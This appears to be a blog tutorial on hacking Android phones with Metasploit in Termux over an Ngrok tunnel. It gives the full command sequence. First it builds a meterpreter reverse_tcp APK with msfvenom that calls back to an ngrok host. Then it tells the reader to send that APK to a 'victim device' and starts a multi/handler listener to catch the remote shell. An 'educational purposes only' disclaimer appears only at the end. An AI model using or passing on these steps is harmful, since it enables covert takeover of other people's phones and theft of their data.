Metasploit Android Hacking Ngrok port forwarding.

install & configure Ngrok
:-Hello guys, today I am going to tell you about how to hack android device by termux with the help of Metasploit Payload. We are going to use Ngrok for port forwading..
:-Follow my steps for android hacking with metasploit termux. Don't do any spelling mistake while typing command.

Step 1 : Install Metasploit In Termux. 

:-Download Termux app from playstore and open it. Then type following command in termux one by one.

$ pkg up -y
$ pkg install unstable-repo
$ pkg install metasploit
       ☠☠☠☠
:-This installation will going to take 140 mb of disk space.

Step 2 : Setup Ngrok Port Forawading Tunnel For Metasploit Payload.

:- We are going to use ngrok server for create port forwarding tunnel. We are going to start tcp server at port 7040.
First we need to install and configure ngrok in termux. So watch video which given below and follow steps from video for install and configure ngrok in termux.
๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป☠☠
click this link☠๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป
:- Then start tcp server on port 7040 by following command. Make sure you turned on Hotspot of your device.

$ ./ngrok tcp 7040

Step 3 : Create Metasploit Payload And Install Into Victim Device.

:-Now we are going to create payload and send this payload to victim device.
First we need to find LHOST and LPORT for host your metasploit payload. 
In my case LHOST= tcp.ngrok.io and LPORT = 16555. This maybe different in your device. So note that lhost and lport some where, we need that on further steps.
:- Now open new session in termux. Don't close first ngrok session. 
$ termux-wake-lock

:- Now create metasploit payload by following command in termux.
          ๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป☠☠๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16555 R > test.apk

:- Here "test.apk" is name of our payload apk file. Enter LHOST and LPORT that we get earlier from ngrok tcp server.
Now we are transfering this payload to our storage download folder. For that type following command.
$ termux-setup-storage -y
$ cp test.apk /data/data/com.termux/files/home/storage/downloads

Step 4 : Opening Metasploit Console. 

:-For open metasploit console in termux type following command.
 $ msfconsole 
๐Ÿ‘‡๐Ÿป☠๐Ÿ‘‡๐Ÿป

Step 5 : Set Metasploit Payload And Exploit It.

:-Now we are going to set that payload to metasploit. For that type following command one by one.
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 0.tcp.ngrok.io
$ set lport 7040 
:-Here 7040 is port number in which we create ngrok server on.
$ exploit 

Don't use this tool for harm anyone. We are not responsible for any illegal activity done by you. All content provided by this website is meant for educational purposes only.
     :-If you are facing error while installing any tool tell us on our  comment section.☠๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป

Comments

Popular posts from this blog

Splunk Command's/Queries & Basic Structure/Components &More...

Information Security๐Ÿ‘ฝ